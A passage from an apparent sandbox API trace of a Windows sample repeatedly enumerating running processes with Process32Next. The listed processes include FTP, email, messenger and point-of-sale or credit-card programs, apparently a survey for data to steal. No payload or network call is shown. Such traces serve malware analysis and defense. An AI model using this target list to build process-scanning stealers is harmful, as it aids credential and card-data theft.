hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0267.542] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0267.544] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.548] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0267.550] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0267.551] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0267.552] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0267.554] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.555] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0267.556] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0267.558] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0267.559] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0267.561] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0267.562] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0267.563] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0267.565] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0267.566] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0267.568] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0267.569] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0267.570] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0267.572] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0267.611] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0267.613] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0267.614] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0267.616] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0267.617] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0267.619] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0267.620] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0267.622] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0267.623] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0267.625] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0267.626] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0267.628] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0267.629] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0267.631] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0267.632] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0267.633] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0267.635] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0267.637] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0267.639] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0267.640] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0267.642] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0267.644] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0267.646] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0267.647] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0267.649] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0267.698] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0267.703] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0267.704] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0267.706] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0267.708] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0267.710] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0267.711] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0267.713] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0267.732] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0267.734] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0267.736] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0267.738] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0267.740] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0267.741] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0267.743] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0267.744] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0267.748] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0267.750] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0267.752] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0267.753] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0267.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0267.756] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0267.758] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0267.759] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0267.800] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0267.802] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0267.803] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0267.805] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0267.807] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0267.811] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0267.813] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0267.814] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0267.816] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.817] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0267.819] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0267.821] CloseHandle (hObject=0x1d14) returned 1 [0267.821] Sleep (dwMilliseconds=0x64) [0268.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0268.046] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.048] Process32Next (in: 